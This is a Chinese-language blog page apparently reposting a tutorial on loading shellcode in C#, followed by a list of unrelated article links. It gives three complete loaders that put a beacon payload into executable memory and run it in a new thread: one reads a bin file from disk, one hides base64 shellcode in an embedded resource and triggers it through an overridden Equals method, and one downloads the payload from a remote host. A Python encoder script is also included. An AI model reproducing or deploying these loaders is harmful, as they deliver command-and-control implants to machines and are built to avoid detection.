当前位置：首页 > news >正文

c#加载shellcode

news 2026/3/31 20:24:00

本地加载bin文件

SharpPELoader项目如下：

using System;
using System.IO;
using System.Runtime.InteropServices;namespace TestShellCode
{internal class Program{private const uint MEM_COMMIT = 0x1000;private const uint PAGE_EXECUTE_READWRITE = 0x40;private const uint INFINITE = 0xFFFFFFFF;static void Main(string[] args){string shellcodeFilePath = "beacon_x6493.bin";if (!File.Exists(shellcodeFilePath)){Console.WriteLine("Shellcode file not found.");return;}byte[] shellcode = File.ReadAllBytes(shellcodeFilePath);IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);if (funcAddr == IntPtr.Zero){Console.WriteLine($"VirtualAlloc failed with error code {Marshal.GetLastWin32Error()}.");return;}Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);IntPtr hThread = CreateThread(IntPtr.Zero, 0, funcAddr, IntPtr.Zero, 0, out uint threadId);if (hThread == IntPtr.Zero){Console.WriteLine($"CreateThread failed with error code {Marshal.GetLastWin32Error()}.");VirtualFree(funcAddr, 0, MEM_COMMIT);return;}WaitForSingleObject(hThread, INFINITE);CloseHandle(hThread);VirtualFree(funcAddr, 0, MEM_COMMIT);}[DllImport("kernel32.dll", SetLastError = true)]private static extern IntPtr VirtualAlloc(IntPtr lpAddress,uint dwSize,uint flAllocationType,uint flProtect);[DllImport("kernel32.dll", SetLastError = true)]private static extern bool VirtualFree(IntPtr lpAddress,uint dwSize,uint dwFreeType);[DllImport("kernel32.dll", SetLastError = true)]private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,uint dwStackSize,IntPtr lpStartAddress,IntPtr lpParameter,uint dwCreationFlags,out uint lpThreadId);[DllImport("kernel32.dll", SetLastError = true)]private static extern bool CloseHandle(IntPtr hObject);[DllImport("kernel32.dll", SetLastError = true)]private static extern uint WaitForSingleObject(IntPtr hHandle,uint dwMilliseconds);}
}

在这里插入图片描述

使用本地分离加载（资源加载base64形式）

首先需要base64编码后的shellcode文件
使用enc.py进行base64编码
在这里插入图片描述
enc.py如下

import base64
import sysfile = sys.argv[1]
with open(file, "rb") as f:all_data = f.read()# Encode the content using Base64
encoded_data = base64.b64encode(all_data)with open("a.txt", "wb") as f:f.write(encoded_data)

得到a.txt文件改名为config.txt（这里改名不改名都可以，因为后面资源文件名字改掉就好）
SharpPELoader_base64项目如下在这里插入图片描述
可以看到主文件Program.cs

using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;namespace SharpPELoader_base64
{public class Loader{public override bool Equals(object obj){Thread t = new Thread(test);t.Start();return true;}public void test(){Assembly myAssem = Assembly.GetEntryAssembly();ResourceManager rm = new ResourceManager("SharpPELoader_base64.Resource1", myAssem);// 资源文件中读取shellcode加载string config = rm.GetString("config");byte[] shellcode = Convert.FromBase64String(config);UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);Marshal.Copy(shellcode, 0, (IntPtr)funcAddr, shellcode.Length);IntPtr hThread = IntPtr.Zero;UInt32 threadId = 0;IntPtr pinfo = IntPtr.Zero;hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);WaitForSingleObject(hThread, 0xFFFFFFFF);}private static UInt32 MEM_COMMIT = 0x1000;private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;[DllImport("kernel32")]private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size,UInt32 flAllocationType,UInt32 flProtect);[DllImport("kernel32")]private static extern bool VirtualFree(IntPtr lpAddress,UInt32 dwSize,UInt32 dwFreeType);[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 lpThreadAttributes,UInt32 dwStackSize,UInt32 lpStartAddress,IntPtr param,UInt32 dwCreationFlags,ref UInt32 lpThreadId);[DllImport("kernel32")]private static extern bool CloseHandle(IntPtr handle);[DllImport("kernel32")]private static extern UInt32 WaitForSingleObject(IntPtr hHandle,UInt32 dwMilliseconds);[DllImport("kernel32")]private static extern IntPtr GetModuleHandle(string moduleName);[DllImport("kernel32")]private static extern UInt32 GetProcAddress(IntPtr hModule,string procName);[DllImport("kernel32")]private static extern UInt32 LoadLibrary(string lpFileName);[DllImport("kernel32")]private static extern UInt32 GetLastError();}class Program{static void Main(string[] args){// 创建 Loader 类的实例Loader loader = new Loader();// 启动线程执行 test 方法loader.Equals(null);}}
}

两个方法，命名空间注意和项目一致，一个loader类，一个Main类，Main调用loader类中的test方法
这里项目需要通过添加资源文件，因为是从资源文件中读取的shellcode
添加资源文件方法如下：在这里插入图片描述
新建项

新建完之后先修改名称为之前代码中的config，也就是和下面这块

然后添加资源

添加现有文件config.txt
添加进来即可，这里命名空间都是对的都是项目的命名空间
这里和
是匹配的才可以，所以结合之前的config（资源名字）匹配就可以资源加载了

远端加载

这里在本地加载bin文件基础上修改
使用GetByteArrayAsync;
在这里插入图片描述
全部代码

using System;
using System.IO;
using System.Net.Http;
using System.Runtime.InteropServices;
using System.Threading.Tasks;namespace RemoteShellcodeLoader
{internal class Program{private const uint MEM_COMMIT = 0x1000;private const uint PAGE_EXECUTE_READWRITE = 0x40;private const uint INFINITE = 0xFFFFFFFF;static async Task Main(string[] args){string url = "http://x.x.x.x:89/beacon_x6493.bin";byte[] shellcode = await DownloadShellcodeAsync(url);if (shellcode == null){Console.WriteLine("Failed to download shellcode.");return;}IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);if (funcAddr == IntPtr.Zero){Console.WriteLine($"VirtualAlloc failed with error code {Marshal.GetLastWin32Error()}.");return;}Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);IntPtr hThread = CreateThread(IntPtr.Zero, 0, funcAddr, IntPtr.Zero, 0, out uint threadId);if (hThread == IntPtr.Zero){Console.WriteLine($"CreateThread failed with error code {Marshal.GetLastWin32Error()}.");VirtualFree(funcAddr, 0, MEM_COMMIT);return;}WaitForSingleObject(hThread, INFINITE);CloseHandle(hThread);VirtualFree(funcAddr, 0, MEM_COMMIT);}private static async Task<byte[]> DownloadShellcodeAsync(string url){using (HttpClient client = new HttpClient()){try{return await client.GetByteArrayAsync(url);}catch (Exception ex){Console.WriteLine($"Error downloading shellcode: {ex.Message}");return null;}}}[DllImport("kernel32.dll", SetLastError = true)]private static extern IntPtr VirtualAlloc(IntPtr lpAddress,uint dwSize,uint flAllocationType,uint flProtect);[DllImport("kernel32.dll", SetLastError = true)]private static extern bool VirtualFree(IntPtr lpAddress,uint dwSize,uint dwFreeType);[DllImport("kernel32.dll", SetLastError = true)]private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,uint dwStackSize,IntPtr lpStartAddress,IntPtr lpParameter,uint dwCreationFlags,out uint lpThreadId);[DllImport("kernel32.dll", SetLastError = true)]private static extern bool CloseHandle(IntPtr hObject);[DllImport("kernel32.dll", SetLastError = true)]private static extern uint WaitForSingleObject(IntPtr hHandle,uint dwMilliseconds);}
}

c#加载shellcode

本地加载bin文件

使用本地分离加载（资源加载base64形式）

远端加载

相关文章：

c#加载shellcode

HarmonyOS 开发环境搭建

【网络云计算】2024第46周周考-磁盘管理的基础知识-RAID篇

深入理解 SQL_MODE 之 ANSI_QUOTES

容器技术在持续集成与持续交付中的应用

【嵌入式软件-STM32】OLED显示屏+调试方法

kubernetes简单入门实战

Python连接Mysql、Postgre、ClickHouse、Redis常用库及封装方法

如何修改npm包

Django 2024全栈开发指南（三）：数据库模型与ORM操作（上篇）

低代码可视化-uniapp开关选择组件-低码生成器

【arxiv‘24】Vision-Language Navigation with Continual Learning

如何在 Ubuntu 上安装 Jupyter Notebook

免费申请 Let‘s Encrypt SSL 证书

【JAVA】Java基础—面向对象编程：继承—重写父类方法

【C++初阶】C++入门

自然推理系统：的拒取式的解析

OceanBase 分区表详解

Java中 LinkedList＜＞，ArrayDeque＜＞的区别 || Queue和Deque的区别

freemarker 读取template.xml ,通过response 输出文件，解决中文乱码问题

扩散模型之（十八）ControlNet 原理与指南

手把手教你用Qt6和Arduino Uno打造实时数据监控面板（附串口数据粘包处理源码）

避坑指南：用docker-compose部署Python项目时最容易忽略的5个配置细节（内网特别版）

App UI自动化项目模板

nuScenes数据集避坑指南：从数据下载到多模态可视化完整流程

三三复制商业模式系统介绍

释放创意：Mi-Create让智能表盘设计触手可及

Z-Image-Turbo_Sugar脸部Lora赋能网络安全：生成模拟人脸进行隐私保护测试

SDMatte效果对比评测：与传统抠图工具及在线API的全面比拼

Phi-3-mini-4k-instruct-gguf应用落地：教育场景中的作业辅导与知识点提炼